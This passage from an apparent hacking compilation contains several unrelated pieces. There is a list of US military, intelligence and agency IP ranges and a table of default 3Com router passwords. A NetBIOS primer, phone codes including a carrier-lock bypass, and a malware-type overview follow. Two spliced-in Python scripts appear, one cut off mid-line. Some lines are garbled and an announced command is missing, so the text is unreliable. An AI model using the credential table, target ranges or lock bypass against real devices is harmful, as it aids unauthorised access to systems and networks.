155.155.0.0
HQ, 5th Signal Command \
155.178.0.0
Federal Aviation Administration
155.213.0.0
USAISC Fort Benning
155.214.0.0
Director of Information Management
155.215.0.0
USAISC-FT DRUM
155.216.0.0
TCACCIS Project Management Office
155.217.0.0
Directorate of Information Management
155.218.0.0
USAISC
155.219.0.0
DOIM/USAISC Fort Sill
155.220.0.0
USAISC-DOIM
155.221.0.0
USAISC-Ft Ord
RANGE 156 156.9.0.0
U. S. Marshals Service
80
RANGE 158 158.1.0.0
Commander, Tooele Army Depot
58.2.0.0
USAMC Logistics Support Activity
158.3.0.0
U.S. Army TACOM
158.6.0.0
USAISC-Ft. McCoy
158.8.0.0
US Army Soldier Support Center
158.9.0.0
USAISC-CECOM
158.10.0.0
GOC
158.11.0.0
UASISC-Vint UASISC-Vint Hill
158.12.0.0
US Army Harry Diamond Laboratories
158.13.0.0
USAISC DOIM
158.14.0.0
1112th 1112th Signal Battalion
158.16.0.0
Rocky Mountain Arsenal (PMRMA)
158.17.0.0
Crane Army Ammunition Activity
158.18.0.0
Defense Finance & Accounting Service Center
158.19.0.0
DOIM
158.20.0.0
DOIM
158.235.0.0
Marine Corps Central Design and Programming Activity
158.243.0.0
Marine Corps Central Design and Programming Activity
158.244.0.0
Marine Corps Central Design and Programming Activity
158.245.0.0
Marine Corps Central Design and Programming Activity
158.246.0.0
Marine Corps Central Design and Programming Activity
RANGE 159 159.120.0.0
Naval Air Systems Command (Air 4114)
RANGE 160 160.132.0.0
US Army Recruiting Command
|160.135.0.0
36th Signal BN
160.138.0.0
USAISC
160.139.0.0
USAISC
160.140.0.0
HQ, United States Army
160.143.0.0
USAISC 81
160.145.0.0
1101st Signal Brigade
160.146.0. 160.1 46.0.0 0
USAISC SATCOMSTA-CAMP SATCOMSTA-CAMP ROBERTS
160.150.0.0
Commander, Moncrief Army Hospital
RANGE 161 161.124.0. 161.1 24.0.0 0
NAV NAVAL WEAPONS STATION STATION
RANGE 162 162.32.0.0
Naval Aviation Depot Pensacola
162.45.0.0
Central Intelligence Agency
162.46.0.0
Central Intelligence Agency |
RANGE 163 163.205.0.0
NASA Kennedy Space Center
163.206.0.0
NASA Kennedy Space Center
RANGE 164 164.45.0.0
Naval Ordnance Center, Pacific Division
164.49.0.0
United States Army Space and Strategic Defense
164.158.0.0
Naval Surface Warfare Center
164.217.0.0
Institute for Defense Analyses
164.223.0.0
Naval Undersea Warfare Center \
164.224.0.0
Secretary of the Navy
164.225.0.0
U.S. Army Intelligence and Security Command
164.226.0.0
Naval Exchange Service Command
164.227.0.0
Naval Surface Warfare Center, Crane Division
164.228.0.0
USCINCPAC USCINCPAC J21T
164.229.0.0
NCTS-NOLA
164.230.0.0
Naval Aviation Depot
164.231.0.0
Military Sealift Command
RANGE 167 167.44.0.0
Government Telecommunications Agency 82
RANGE 168 168.68.0.0
USDA Office of Operations
168.85.0.0
Fort Sanders Alliance
168.102.0.0
Indiana Purdue Fort Wayne
RANGE 169 169.252.0.0 - 169.253.0.0
U.S. Department of State
RANGE 195 195.10.* Various Various - Do not scan
RANGE 199 199.121.4.0 - 199.121.253.0 Naval Nav al Air Systems Command, VA VA
RANGE 203 203.59.0.0 - 203.59.255.255 203.59.255 .255 Perth Australia iiNET
RANGE 205 205.0.0.0 - 205.117.255.0 2 05.117.255.0 Department of the Navy, Navy, Space and Naval Warfare System Command, Comman d, Washington DC - SPAW SPAWAR 205.96.* - 205.103.* RANGE 207 207.30.* Sprint/United Telephone of Florida
Back
83
Default Router Password
Manufacturer  Model                          OS Version  Login          Password
================================================================================
3Com          -                              1.25        root           letmein
3Com          CoreBuilder 2500               -           -              -
3Com          Switch 3000/3300               -           manager        manager
3Com          Switch 3000/3300               -           admin          admin
3Com          Switch 3000/3300               -           security       security
3Com          NAC (Network Access Card)      -           adm            none
3Com          HiPer ARC Card                 -           adm            none
3Com          CoreBuilder 6000               -           debug          tech
3Com          CoreBuilder 7000               -           tech           tech
3Com          SuperStack / CoreBuilder       -           admin          -
3Com          SuperStack / CoreBuilder       -           read           -
3Com          SuperStack / CoreBuilder       -           write          -
3Com          LinkSwitch and CellPlex        -           tech           tech
3Com          LinkSwitch and CellPlex        -           debug          synnet
3Com          Superstack II 3300FX           -           admin          -
3Com          Switch 3000/3300               -           Admin          3com
3Com          3comCellPlex7000               -           tech           tech
3Com          Switch 3000/3300               -           monitor        monitor
3Com          AirConnect Access Point        n/a         -              comcomcom
3Com          Switch 3000/3300               -           admin          -
3Com          OCR-812                        -           root           !root
3Com          NBX 100                        -           administrator  0000
3Com          Home Connect                   2.8         User           Password
Understanding NetBIOS

What is NetBIOS?

NetBIOS (Network Basic Input/Output System) was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. Since its creation, NetBIOS has become the basis for many other networking applications. In its strictest sense, NetBIOS is an interface specification for accessing networking services. NetBIOS, a layer of software developed to link a network operating system with specific hardware, was originally designed as THE network controller for IBM's Network LAN. NetBIOS has now been extended to allow programs written using the NetBIOS interface to operate on the IBM token ring architecture. NetBIOS has since been adopted as an industry standard and now it is common to refer to NetBIOS-compatible LANs. It offers network applications a set of "hooks" to carry out inter-application communication and data transfer. In a basic sense, NetBIOS allows applications to talk to the network. Its intention is to isolate application programs from any type of hardware dependencies. It also spares software developers the task of developing network error recovery and low-level message addressing or routing. The use of the NetBIOS interface does a lot of this work for them. NetBIOS standardizes the interface between applications and a LAN's operating capabilities.
With this, it can be specified to which levels of the OSI model the application can write, making the application transportable to other networks. In a NetBIOS LAN environment, computers are known on the system by a name. Each computer on the network has a permanent name that is programmed in various different ways. These names will be discussed in more detail below. PCs on a NetBIOS LAN communicate either by establishing a session or by using NetBIOS datagram or broadcast methods. Sessions allow for a larger message to be sent and handle error detection and correction. The communication is on a one-to-one basis. Datagram and broadcast methods allow one computer to communicate with several other computers at the same time, but are limited in message size. There is no error detection or correction using these datagram or broadcast methods. However, datagram communication allows for communication without having to establish a session.
All communication in these environments is presented to NetBIOS in a format called Network Control Blocks (NCB). The allocation of these blocks in memory is dependent on the user program. These NCBs are divided into fields, which are reserved for input and output respectively. NetBIOS is a very common protocol used in today's environments. NetBIOS is supported on Ethernet, Token Ring, and IBM PC Networks. In its original induction, it was defined as only an interface between the application and the network adapter. Since then, transport-like functions have been added to NetBIOS, making it more functional over time. In NetBIOS, connection-oriented (TCP) and connectionless (UDP) communication are both supported. It supports both broadcasts and multicasting and supports three distinct services: Naming, Session, and Datagram.
NetBIOS Names

NetBIOS names are used to identify resources on a network. Applications use these names to start and end sessions. You can configure a single machine with multiple applications, each of which has a unique NetBIOS name. Each PC that supports an application also has a NetBIOS station name that is user defined or that NetBIOS derives by internal means. A NetBIOS name can consist of up to 16 alphanumeric characters. The combination of characters must be unique within the entire source routing network. Before a PC that uses NetBIOS can fully function on a network, that PC must register its NetBIOS name. When a client becomes active, the client advertises its name. A client is considered to be registered when it can successfully advertise itself without any other client claiming it has the same name. The steps of the registration process are as follows:
1. Upon boot up, the client broadcasts itself and its NetBIOS information anywhere from 6 to 10 times to ensure every other client on the network receives the information.
2. If another client on the network already has the name, that NetBIOS client issues its own broadcast to indicate that the name is in use. The client that is trying to register the already-in-use name stops all attempts to register that name.
3. If no other client on the network objects to the name registration, the client will finish the registration process.
There are two types of names in a NetBIOS environment: Unique and Group. A unique name must be unique across the network. A group name does not have to be unique and all processes that have a given group name belong to the group. Each NetBIOS node maintains a table of all names currently owned by that node. The NetBIOS naming convention allows for 16 characters in a NetBIOS name. Microsoft, however, limits these names to 15 characters and uses the 16th character as a NetBIOS suffix. A NetBIOS suffix is used by Microsoft Networking software to identify the functionality installed or the registered device or service. [QuickNote: SMB and NBT (NetBIOS over TCP/IP) work very closely together and both use ports 137, 138, 139. Port 137 is NetBIOS name (UDP). Port 138 is NetBIOS datagram (UDP). Port 139 is NetBIOS session (TCP). For further information on NetBIOS, read the paper at the rhino9 website listed above.] The following is a table of NetBIOS suffixes currently used by Microsoft Windows NT. These suffixes are displayed in hexadecimal format.
Name                Number  Type  Usage
==========================================================================
<computername>      00      U     Workstation Service
<computername>      01      U     Messenger Service
<\\_MSBROWSE_>      01      G     Master Browser
<computername>      03      U     Messenger Service
<computername>      06      U     RAS Server Service
<computername>      1F      U     NetDDE Service
<computername>      20      U     File Server Service
<computername>      21      U     RAS Client Service
<computername>      22      U     Exchange Interchange
<computername>      23      U     Exchange Store
<computername>      24      U     Exchange Directory
<computername>      30      U     Modem Sharing Server Service
<computername>      31      U     Modem Sharing Client Service
<computername>      43      U     SMS Client Remote Control
<computername>      44      U     SMS Admin Remote Control Tool
<computername>      45      U     SMS Client Remote Chat
<computername>      46      U     SMS Client Remote Transfer
<computername>      4C      U     DEC Pathworks TCPIP Service
<computername>      52      U     DEC Pathworks TCPIP Service
<computername>      87      U     Exchange MTA
<computername>      6A      U     Exchange IMC
<computername>      BE      U     Network Monitor Agent
<computername>      BF      U     Network Monitor Apps
<username>          03      U     Messenger Service
<domain>            00      G     Domain Name
<domain>            1B      U     Domain Master Browser
<domain>            1C      G     Domain Controllers
<domain>            1D      U     Master Browser
<domain>            1E      G     Browser Service Elections
<INet~Services>     1C      G     Internet Information Server
<IS~computername>   00      U     Internet Information Server
<computername>      [2B]    U     Lotus Notes Server
IRISMULTICAST       [2F]    G     Lotus Notes
IRISNAMESERVER      [33]    G     Lotus Notes
Forte_$ND800ZA      [20]    U     DCA Irmalan Gateway Service
Unique (U): The name may have only one IP address assigned to it. On a network device, multiple occurrences of a single name may appear to be registered, but the suffix will be unique, making the entire name unique.
Group (G): A normal group; the single name may exist with many IP addresses.
Multihomed (M): The name is unique, but due to multiple network interfaces on the same computer, this configuration is necessary to permit the registration. Maximum number of addresses is 25.
Internet Group (I): This is a special configuration of the group name used to manage WinNT domain names.
Domain Name (D): New in NT 4.0.
For a quick and dirty look at a server's registered NetBIOS names and services, issue the following NBTSTAT command:
NetBIOS Sessions

The NetBIOS session service provides a connection-oriented, reliable, full-duplex message service to a user process. NetBIOS requires one process to be the client and the other to be the server. NetBIOS session establishment requires a preordained cooperation between the two stations. One application must have issued a Listen command when another application issues a Call command. The Listen command references a name in its NetBIOS name table (or WINS server), and also the remote name an application must use to qualify as a session partner. If the receiver (listener) is not already listening, the Call will be unsuccessful. If the call is successful, each application receives notification of session establishment with the session-id. The Send and Receive commands then transfer data. At the end of a session, either application can issue a Hang-Up command. There is no real flow control for the session service because it is assumed a LAN is fast enough to carry the required traffic.
NetBIOS Datagrams

Datagrams can be sent to a specific name, sent to all members of a group, or broadcast to the entire LAN. As with other datagram services, NetBIOS datagrams are connectionless and unreliable. The Send_Datagram command requires the caller to specify the name of the destination. If the destination is a group name, then every member of the group receives the datagram. The caller of the Receive_Datagram command must specify the local name for which it wants to receive datagrams. The Receive_Datagram command also returns the name of the sender, in addition to the actual datagram data. If NetBIOS receives a datagram, but there are no Receive_Datagram commands pending, then the datagram is discarded. The Send_Broadcast_Datagram command sends the message to every NetBIOS system on the local network. When a broadcast datagram is received by a NetBIOS node, every process that has issued a Receive_Broadcast_Datagram command receives the datagram. If none of these commands are outstanding when the broadcast datagram is received, the datagram is discarded. NetBIOS enables an application to establish a session with another device and lets the network redirector and transaction protocols pass a request to and from another machine. NetBIOS does not actually manipulate the data. The NetBIOS specification defines an interface to the network protocol used to reach those services, not the protocol itself. Historically, NetBIOS has been paired with a network protocol called NetBEUI (network extended user interface). The association of the interface and the protocol has sometimes caused confusion, but the two are different. Network protocols always provide at least one method for locating and connecting to a particular service on a network. This is usually accomplished by converting a node or service name to a network address (name resolution). NetBIOS service names must be resolved to an IP address before connections can be established with TCP/IP. Most NetBIOS implementations for TCP/IP accomplish name-to-address resolution by using either broadcast or LMHOSTS files. In a Microsoft environment, you would probably also use a NetBIOS Name Server known as WINS.
NetBEUI Explained

NetBEUI is an enhanced version of the NetBIOS protocol used by network operating systems. It formalizes the transport frame that was never standardized in NetBIOS and adds additional functions. It is the transport layer driver frequently used by Microsoft's LAN Manager. NetBEUI implements the OSI LLC2 protocol. NetBEUI is the original PC networking protocol and interface designed by IBM for the LAN Manager Server. This protocol was later adopted by Microsoft for their networking products. It specifies the way that higher-level software sends and receives messages over the NetBIOS frame protocol. This protocol runs over the standard 802.2 data-link protocol layer.
NetBIOS Scopes

A NetBIOS Scope ID provides an extended naming service for the NetBIOS over TCP/IP (known as NBT) module. The primary purpose of a NetBIOS scope ID is to isolate NetBIOS traffic on a single network to only those nodes with the same NetBIOS scope ID. The NetBIOS scope ID is a character string that is appended to the NetBIOS name. The NetBIOS scope ID on two hosts must match, or the two hosts will not be able to communicate. The NetBIOS Scope ID also allows computers to use the same computer name as long as they have different scope IDs. The Scope ID becomes a part of the NetBIOS name, making the name unique.
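To make the name format concrete, the following is an added example (not code from the original text): it builds the 16-byte name described under NetBIOS Names (15 characters plus the Microsoft suffix byte from the table above), applies the RFC 1001 first-level encoding that NBT uses on UDP port 137, appends the scope ID described under NetBIOS Scopes as DNS-style labels, and decodes the result back. The host name FILESRV1 and scope corp.example are constructed sample values, and the suffix lookup covers only a subset of the table.

```python
"""NetBIOS name encoding helpers (added example, not from the original text)."""

# Subset of the Windows NT suffix table above: (suffix, type) -> usage
SUFFIX_USAGE = {
    (0x00, "U"): "Workstation Service",
    (0x00, "G"): "Domain Name",
    (0x01, "G"): "Master Browser",
    (0x03, "U"): "Messenger Service",
    (0x06, "U"): "RAS Server Service",
    (0x1B, "U"): "Domain Master Browser",
    (0x1C, "G"): "Domain Controllers",
    (0x1D, "U"): "Master Browser",
    (0x1E, "G"): "Browser Service Elections",
    (0x20, "U"): "File Server Service",
    (0x21, "U"): "RAS Client Service",
}


def raw_name(name: str, suffix: int) -> bytes:
    """16 raw bytes: 15 characters, upper-cased and space-padded, then the suffix."""
    if not 1 <= len(name) <= 15:
        raise ValueError("Microsoft NetBIOS names are 1..15 characters")
    if not 0 <= suffix <= 0xFF:
        raise ValueError("the suffix is a single byte")
    return name.upper().ljust(15).encode("ascii") + bytes([suffix])


def first_level_encode(name: str, suffix: int) -> str:
    """RFC 1001 first-level encoding: each nibble becomes one letter A..P."""
    return "".join(chr(0x41 + (b >> 4)) + chr(0x41 + (b & 0x0F))
                   for b in raw_name(name, suffix))


def first_level_decode(encoded: str) -> tuple[str, int]:
    """Inverse of first_level_encode: returns (name without padding, suffix)."""
    if len(encoded) != 32 or any(c not in "ABCDEFGHIJKLMNOP" for c in encoded):
        raise ValueError("expected 32 letters in the range A..P")
    nibbles = [ord(c) - 0x41 for c in encoded]
    raw = bytes((hi << 4) | lo for hi, lo in zip(nibbles[0::2], nibbles[1::2]))
    return raw[:15].decode("ascii").rstrip(" "), raw[15]


def second_level_encode(name: str, suffix: int, scope: str = "") -> bytes:
    """Wire form used in NBT packets: length-prefixed labels, first the 32-letter
    name, then the scope ID split on '.', ending with a zero-length label."""
    labels = [first_level_encode(name, suffix).encode("ascii")]
    if scope:
        labels += [part.encode("ascii") for part in scope.split(".")]
    out = b""
    for label in labels:
        if not 1 <= len(label) <= 63:
            raise ValueError("each label must be 1..63 bytes")
        out += bytes([len(label)]) + label
    return out + b"\x00"


def second_level_decode(wire: bytes) -> tuple[str, int, str]:
    """Parse the wire form back into (name, suffix, scope)."""
    labels, pos = [], 0
    while True:
        length = wire[pos]
        pos += 1
        if length == 0:
            break
        labels.append(wire[pos:pos + length].decode("ascii"))
        pos += length
    name, suffix = first_level_decode(labels[0])
    return name, suffix, ".".join(labels[1:])


def describe(name: str, suffix: int, group: bool = False) -> str:
    """One line in the style of the suffix table: name, <suffix>, type, usage."""
    kind = "G" if group else "U"
    usage = SUFFIX_USAGE.get((suffix, kind), "unknown")
    return f"{name:<15}<{suffix:02X}> {kind} {usage}"


if __name__ == "__main__":
    # Constructed sample values, not taken from any real network.
    wire = second_level_encode("FILESRV1", 0x20, "corp.example")
    print(wire)
    host, sfx, scope = second_level_decode(wire)
    print(describe(host, sfx), "scope:", scope)
```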
Mobile hacking

Nokia 2110/2110i: these codes show you the software version, software date and hardware model number of your phone.
On 2110, type: * # 9999 #
On 2110i, one of the following may function: * # 170602112302 # or * # 682371158412125 #
Show IMEI code
If you need to know the IMEI code of your phone, simply press:
* # 06 # and you'll read it on the display.
Change IMEI code If you want to change IMEI code of your phone (we don't want to know "why"), here is the software you'll need.
Show manufacturing date
To get the manufacturing date of your phone, press: * # 3283 # (= *#date#)
In 1995 phones, the date is in "mmyy" format; 1996 and later phones show the date in "wwyy" format.
Unlock SP lock
Here is a way to unlock your phone which is Service Provider locked, without knowing the SPLock code!!!! Give it a try (and give us feedback, please): Turn the phone on; when the phone asks for the Security Code, press:
112
now quickly press:
# send end send end.
Each time you turn your phone OFF it resets the lock, so this needs to be done each time you turn your phone ON :-( Anyway, it's better than nothing, isn't it?
Pin-Out

    ANT          16             9        Charging connector
    (O)      I-I-I-I-I-I-I-I       ( )       ( o )
             I-I-I-I-I-I-I-I
    CON       8             1

The left symbol (O) is the antenna connector for car kits. The symbol numbered 16-9 on the top and 8-1 on the bottom is the system connector. The ( ) is the open space next to the connector and the ( o ) is the charging connector for your home charger.
PIN Description
1 - Digital ground
2 - External audio input from accessories or handsfree microphone. Multiplexed with junction box connection control signal
3 - Analogue ground for accessories
4 - Transmitted DBUS data to the accessories
5 - Serial bidirectional data between the phone and accessories
6 - Hook indication. HP has a 100KE pull-up resistor.
7 - Handsfree device power on/off, data to flash programming device.
8 - Battery charging voltage
9 - Digital ground
10 - External audio output to accessories or handsfree speaker
11 - DBUS data bit sync clock
12 - DBUS received data from the accessories
13 - Power supply to headset adapter
14 - Programming voltage for FLASH
15 - DBUS data clock
16 - Battery charging voltage
Software bug
Software versions prior to ver. 5.48 may randomly reset and restart; this seems to be fixed in later versions.
For: Motorola d460, 2500, 6200 (Flare), 7500, 8200, 8400 & 8700
IMEI: *#06# displays the IMEI on the 8700, NOT on the 6200, 7500, 8200.
To activate RBS: (pause means the * key held in until box appears)
[pause] [pause] [pause] 1 1 3 [pause] 1 [pause] [ok]
You now have to press the [MENU] and scroll to the 'Eng Field Options' function with the keys, and enable it.
To de-activate RBS: [pause] [pause] [pause] 1 1 3 [pause] 0 [pause] [ok]
This only works with some versions of software. Please report what works and doesn't for you. Reported working, by country:
d460: IT
6200 Flare: UK (Orange), AU
7500: IT (model: F16 HW: 5.2 SW: 2.1)
8200: ES, AU, NL, BE
8400: IT, NL
8700: AU, IT, SG, DE, ES, ZA
Uses of RBS: Distance From Base Station - Place a call, when it is answered, press [MENU] until 'Eng Field Option' is displayed, press [OK], select 'Active Cell', press [OK], press [MENU] until 'Time Adv xxx' appears, where xxx is a number. Multiply this number by 550, and the result is the distance from the RBS (Radio Base Station), in meters.
Signal Quality - press [MENU] until 'Eng Field Option' is displayed, press [OK], select 'Active Cell', press [OK], press [MENU] until 'C1' appears. This is the signal quality. If it becomes negative for longer than 5 seconds, a new cell is selected.
Viruses
Index
• Introduction to Computer Viruses
• History
• Why Do People Write Viruses
• Virus Code
Introduction to Computer Viruses

A person might have a computer virus infection when the computer starts acting differently. For instance, it gets slow, or when they turn the computer on it says that all the data is erased, or when they start writing a document it looks different, some chapters might be missing or something else abnormal has happened. The next thing that usually happens is that the person whose computer might be infected with a virus panics. The person might think that all the work that has been done is missing. That could be true, but in most cases the viruses have not done any harm yet; but when one starts doing something and is not sure what one is doing, that might be harmful. When some people try to get rid of viruses they delete files or they might even format the whole hard disk, like my cousin did. That is not the best way to act when a person thinks that he has a virus infection. What do people do when they get sick? They go to see a doctor if they do not know what is wrong with them. It is the same way with viruses: if the person does not know what to do, they call someone who knows more about viruses and they get professional help. If a person reads email on their PC, or if they use diskettes to transfer files between the computer at work and the computer at home, or if they just transfer files between the two computers, they have a good possibility of getting a virus. They might also get viruses when they download files from any internet site. There was a time when people were able to be sure that some sites were secure, that those secure sites did not have any virus problems, but nowadays people cannot be sure of anything. There have been viruses even on Microsoft's download sites. In this report I am going to introduce different malware types, how they spread and how to deal with them. The most common viruses nowadays are macro viruses and I am going to spend a little more time on them. I am going to give an example of trojan horses stealing passwords.
Comparison with biological viruses
How viruses work

A computer virus passes from one computer to another much as a biological virus passes from person to person. For example, experts estimate that the Mydoom worm infected a quarter of a million computers in a single day in January 2004. Another example is the ILOVEYOU virus, which appeared in 2000 and had a similar effect; it borrowed most of its operating style from Melissa. There are tens of thousands of viruses out there, and new ones are discovered every day. It is difficult to come up with a generic explanation of how viruses work, since they all have variations in the way they infect and the way they spread. So instead, we have taken some broad categories that are commonly used to describe various types of virus.
Basic types of viruses

File viruses (parasitic viruses)

File viruses are pieces of code that attach themselves to executable files, driver files or compressed files, and are activated when the host program is run. After activation, the virus may spread itself by attaching itself to other programs in the system, and also carry out the malevolent activity it was programmed for. Most file viruses spread by loading themselves into system memory and looking for any other programs located on the drive. If the virus finds one, it modifies the program's code so that the program contains and activates the virus the next time it is run. It keeps doing this over and over until it spreads across the system, and possibly to other systems that the infected program may be shared with. Besides spreading themselves, these viruses also carry some type of destructive constituent that can be activated immediately or by a particular 'trigger'. The trigger could be a specific date, the number of times the virus has been replicated, or anything equally trivial. Some examples of file viruses are Randex, Meve and MrKlunky.
Boot sector viruses

A boot sector virus affects the boot sector of a hard disk, which is a very crucial part. The boot sector is where all information about the drive is stored, along with a program that makes it possible for the operating system to boot up. By inserting its code into the boot sector, a virus guarantees that it loads into memory during every boot sequence. A boot virus does not affect files; instead, it affects the disks that contain them. Perhaps this is the reason for their downfall. During the days when programs were carried around on floppies, the boot sector viruses used to spread like wildfire. However, with the CD-ROM revolution, it became impossible to infect pre-written data on a CD, which eventually stopped such viruses from spreading. Though boot viruses still exist, they are rare compared to new-age malicious software. Another reason why they are not so prevalent is that operating systems today protect the boot sector, which makes it difficult for them to thrive. Examples of boot viruses are Polyboot.B and AntiEXE.
Multipartite viruses

Multipartite viruses are a combination of boot sector viruses and file viruses. These viruses come in through infected media and reside in memory. They then move on to the boot sector of the hard drive. From there, the virus infects executable files on the hard drive and spreads across the system. There are not too many multipartite viruses in existence today, but in their heyday they accounted for some major problems due to their capacity to combine different infection techniques. A significantly famous multipartite virus is Ywinz.

Macro viruses

Macro viruses infect files that contain macros. These include Microsoft Office documents such as Word documents, Excel spreadsheets, PowerPoint presentations, Access databases, and other similar application files such as Corel Draw, AmiPro, etc. Since macro viruses are written in the language of the application, and not in that of the operating system, they are known to be platform-independent: they can spread between Windows, Mac, and any other system, so long as it is running the required application. With the ever-increasing capabilities of macro languages in applications, and the possibility of infections spreading over networks, these viruses are major threats. The first macro virus was written for Microsoft Word and was discovered back in August 1995. Today, there are thousands of macro viruses in existence; some examples are Relax, Melissa.A and Bablas.
Network viruses

This kind of virus is proficient in quickly spreading across a Local Area Network (LAN) or even over the Internet. Usually, it propagates through shared resources, such as shared drives and folders. Once it infects a new system, it searches for potential targets by searching the network for other vulnerable systems. Once a new vulnerable system is found, the network virus infects the other system, and thus spreads over the network. Some of the most notorious network viruses are Nimda and SQLSlammer.

E-mail viruses

An e-mail virus could be a form of macro virus that spreads itself to all the contacts located in the host's e-mail address book. If any of the e-mail recipients open the attachment of the infected mail, it spreads to the new host's address book contacts, and then proceeds to send itself to all those contacts as well. These days, e-mail viruses can infect hosts even if the infected e-mail is merely previewed in a mail client. There are many ways in which a virus can infect or stay dormant on your PC. However, whether active or dormant, it is dangerous to let one loose on your system, and it should be dealt with immediately.
Other malicious software

Earlier, the only way a computer was at risk was when you inserted an infected floppy. With the new age of technology, every computer is interconnected to the rest of the world at some point or other, so it is difficult to pinpoint the source and/or time of the infection. As if that weren't bad enough, new-age computing has also brought about a new breed of malicious software. Today, the term 'virus' has become a generic term used for all the different ways that your computer can be attacked by malicious software. Besides the types of viruses we mentioned, here is a look at some of the newer problems we face today.
Trojan horses

The biggest difference between a Trojan horse (or Trojan) and a virus is that Trojans do not spread themselves. Trojan horses disguise themselves as useful software available for download on the Internet, and naive users download and run them only to realise their mistake later. A Trojan horse is usually divided into two parts: a server and a client. It is the client that is cunningly disguised as important software and placed on peer-to-peer file sharing networks or unofficial download sites. Once the client runs on your system, the attacker (the person running the server) has a high level of control over your system, which can lead to devastating effects depending on the attacker's intentions. Trojan horses have evolved to a tremendous level of sophistication, which makes each one significantly different from the other. We have categorized them roughly into the following:
Remote access Trojans

These are the most commonly available Trojans. They give an attacker complete control over the victim's computer. The attacker can go through the files and access any personal information about the user that may be stored in them, such as credit card numbers, passwords, and important financial documents.
Password-Sending Trojans

The purpose of such Trojans is to copy all cached passwords, look for other passwords as you enter them, and send them to a specific mail address without the user's knowledge. Passwords for restricted Web sites, messaging services, FTP services and e-mail services come under direct threat with this kind of Trojan.
Keyloggers

These log victims' keystrokes and then send the logs to the attacker. The attacker then searches for passwords or other sensitive data in the log files. Most of them come with two functions, online and offline recording. Of course, they can be configured to send the log file to a specific e-mail address on a daily basis.
Destructive

The only function of these Trojans is to destroy and delete files. They can automatically delete all the core system files on your machine. The Trojan could be controlled by the attacker or could be programmed to strike like a logic bomb, starting on a specific day or at a specific hour.

Denial of Service (DoS) Attack Trojans

The main idea behind DoS Attack Trojans is to generate a lot of Internet traffic on the victim's machine, to the extent that the Internet connection is too overloaded to let the user visit a website or download anything. Another variation of a DoS Trojan is the mail-bomb Trojan, whose main aim is to infect as many machines as possible and simultaneously attack specific e-mail addresses with random subjects and contents that cannot be filtered.

Proxy/Wingate Trojans

These types of Trojan turn the victim's computer into a proxy/wingate server. That way, the infected computer is available to the whole world to be used for anonymous access to various risky Internet services. The attacker can register domains or access pornographic Web sites with stolen credit cards, or do similar illegal activities, without being traced.

FTP Trojans

These Trojans are probably the most simple, and are outdated. The only thing they do is open port 21, the port for FTP transfers, and let everyone connect to your machine. Newer versions are password protected, so only the attacker can connect to your computer.

Software Detection Killers

These Trojans kill popular antivirus/firewall programs that protect your machine, to give the attacker access to the victim's machine. A Trojan could have any one or a combination of the above-mentioned functionalities.
Worms

Computer worms are programs that reproduce and run independently, and travel across network connections. The main difference between viruses and worms is the method by which they reproduce and spread. A virus is dependent upon a host file or boot sector, and on the transfer of files between machines, to spread, while a worm can run completely independently and spread of its own accord through network connections. The security threat of worms is equivalent to that of a virus. Worms are capable of doing a whole range of damage, such as destroying essential files in your system, slowing it down to a great extent, or even causing some essential programs to crash. Two famous examples of worms are the MS-Blaster and Sasser worms.
Spyware

Spyware is the new-age term for advertising-supported software (Adware). Advertising in shareware products is a way for shareware authors to make money other than by selling the product to the user. There are several large media companies that offer to place banner ads in their products in exchange for a portion of the revenue from banner sales. If the user finds the banners annoying, there is usually an option to get rid of them by paying the licensing fee. Unfortunately, the advertising companies often also install additional tracking software on your system, which continuously uses your Internet connection to send statistical data back to the advertisers. While the privacy policies of the companies claim there will be no sensitive or identifying data collected from your system and that you shall remain anonymous, the fact remains that you have a server sitting on your PC that is sending information about you and your surfing habits to a remote location, using your bandwidth. Spyware has been known to slow down computers with its semi-intensive usage of processing power, bring up annoying pop-up windows at the most inappropriate times, and change your Internet browsing settings such as your home page or default search engine to its own services. Even if many do not consider this illegal, it is still a major security threat, and the fact that there is no way to get rid of it makes it as much of a nuisance as viruses.

Logic Bombs

A logic bomb is a program which has deliberately been written or modified to produce results, when certain conditions are met, that are unexpected and unauthorized by legitimate users or owners of the software.
Logic bombs may reside within standalone programs, or they may be part of worms or viruses. A variation of the logic bomb is the time bomb that ‘explodes’ at a certain time. An example of a time bomb is the infamous ‘Friday the 13th’ virus.
Classification

Viruses can be subdivided into a number of types, the main ones being:

• Boot sector viruses
• Companion viruses
• Email viruses
• Logic bombs and time bombs
• Macro viruses
• Cross-site scripting virus

Two other types of malware are often classified as viruses, but are actually forms of distributing malware:

• Trojan horses
• Worms
Boot sector virus A boot sector virus alters or hides in the boot sector, usually the 1st sector, of a bootable disk or hard drive. Boot sector viruses were prevalent in the 1980s.
Companion virus

A companion virus does not have host files per se, but exploits MS-DOS. A companion virus creates new files (typically .COM, but it can also use other extensions such as ".EXD") that have the same file names as legitimate .EXE files. When a user types in the name of a desired program without specifying a file extension, DOS will assume he meant the file with the extension that comes first in alphabetical order and run the virus. For instance, if a user had "(filename).COM" (the virus) and "(filename).EXE" and typed "filename", he would run "(filename).COM" and thus the virus. The virus will spread and do other tasks before redirecting to the legitimate file, which operates normally. Some companion viruses are known to run under Windows 95 and on DOS emulators on Windows NT systems. Path companion viruses create files that have the same name as the legitimate file and place new virus copies earlier in the directory paths. These viruses have become increasingly rare with the introduction of Windows XP, which does not use the MS-DOS command prompt.
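As an added example (not part of this report), the following Python script flags companion-style name collisions from the defender's side: it lists files in one directory that share a base name but differ in extension, and it walks a search path to show which copy of a command would be run first. The .COM, .EXE, .BAT resolution order, the directory names and the file names are assumptions constructed for the example.

```python
"""Added example, not from the report: find companion-virus style
name collisions. Assumptions (labelled): DOS tries .COM, then .EXE,
then .BAT for an extensionless command; all sample names are constructed.
"""
import os
import tempfile

# Extension precedence, highest priority first (assumed classic DOS order).
DOS_ORDER = [".COM", ".EXE", ".BAT"]


def find_companion_pairs(directory):
    """Return (shadowing_file, shadowed_file) pairs within one directory.

    A pair is reported whenever two files share a base name and the one
    with the higher-priority extension would run in place of the other,
    which is the pattern a companion virus leaves behind.
    """
    by_name = {}
    for entry in os.listdir(directory):
        base, ext = os.path.splitext(entry)
        ext = ext.upper()
        if ext in DOS_ORDER:
            by_name.setdefault(base.upper(), {})[ext] = entry
    pairs = []
    for base, exts in sorted(by_name.items()):
        present = [e for e in DOS_ORDER if e in exts]
        # every higher-priority extension shadows every lower one
        for i, hi in enumerate(present):
            for lo in present[i + 1:]:
                pairs.append((exts[hi], exts[lo]))
    return pairs


def resolve_order(path_dirs, command):
    """List every file that could run for `command`, in the order a DOS
    style search would try them: directory by directory along the path,
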